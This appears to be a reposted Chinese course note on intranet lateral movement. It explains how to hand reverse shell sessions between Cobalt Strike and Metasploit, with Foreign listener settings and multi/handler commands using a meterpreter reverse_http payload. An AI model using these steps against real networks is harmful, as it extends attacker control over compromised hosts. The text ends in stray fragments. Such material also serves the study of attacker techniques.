72内网安全-域横向CS&MSF联动及应急响应知识
2024-01-01 23:05:28
拿到才行,拿不到就是多余的
案例一MSF&CobaltStrike 联动 Shell?
有一些功能可能cs或者msf强大一些,他们两个可以相互调用,在真实情况下也是可以cs和msf同时启动的,
cs移交给msf
.创建Foreign监听器
“Listeners”“Add”,“Name”填“msf”(可随便填),“Payload”选“Foreign HTTP”,“HTTP Host(Stager)”填msf的IP地址,“HTTP Port(Stager)”端口自己设定?
协议不够的时候可以添加插件,
2.MSF监听模块设置对应地址端口
选择监听模块
????use exploit/multi/handler
设置payload,注意与CS保持一致
????set payload windows/meterpreter/reverse_http
设置地址端口,其中地址可以不设或为0.0.0.0,意为任意地址,或者设为msf的IP地址(与CS保持一致);端口一定要保持一致
????set lhost 0.0.0.0
????set lport 6677
检查设置
????show options
执行
????exploit?
3.CS执行Spawn选择监听器
选择需要反弹shell的电脑,右键“Spawn”,选择刚才生成的监听器
稍等可在MSF上看见反弹结果,如果没有请检查网络?
然后选择自己想反弹的主机的shell。
会话就弹出来了
msf移交给cs
CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线
我们的目的就是反弹到cs刚刚生成的监听器,我们要返回s4,就是那个5566端口的
进入相关模块,设置对应的东西,ip,端口,s4等等
ip设置为刚刚cs的ip监听的端口就可以了,运行,cs等待上线
就完成了上线
ping
an
文章来源:https://blog.csdn.net/san3144393495/article/details/135327872
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!